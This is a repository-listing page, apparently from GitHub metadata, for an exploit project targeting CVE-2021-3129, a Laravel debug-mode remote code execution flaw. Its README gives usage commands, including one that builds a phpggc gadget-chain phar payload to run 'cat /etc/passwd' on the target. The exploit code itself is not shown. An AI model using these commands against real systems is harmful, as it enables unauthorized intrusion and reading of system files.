https://github.com/hupe1980/cve-2021-3129
Laravel debug mode - Remote Code Execution (RCE)
https://github.com/hupe1980/cve-2021-3129
cve-2021-3129 laravel
Last synced: 2 months ago
JSON representation
Laravel debug mode - Remote Code Execution (RCE)
- Host: GitHub
- URL: https://github.com/hupe1980/cve-2021-3129
- Owner: hupe1980
- License: mit
- Created: 2022-09-30T17:54:17.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-09-30T21:02:22.000Z (over 2 years ago)
- Last Synced: 2025-02-02T02:14:03.765Z (4 months ago)
- Topics: cve-2021-3129, laravel
- Language: Python
- Homepage:
- Size: 4.88 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# CVE-2021-3129
Laravel debug mode - Remote Code Execution (RCE)
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3129
- https://www.ambionics.io/blog/laravel-debug-rce
- https://github.com/ambionics/phpggc
# Example
```bash
python3 exploit.py http://127.0.0.1:8080
```
```bash
python3 exploit.py http://127.0.0.1:8080 --phar $(php -d phar.readonly=off -d phar.require_hash=off ./phpggc --phar phar -f monolog/rce1 system 'cat /etc/passwd' | base64 -w 0)
```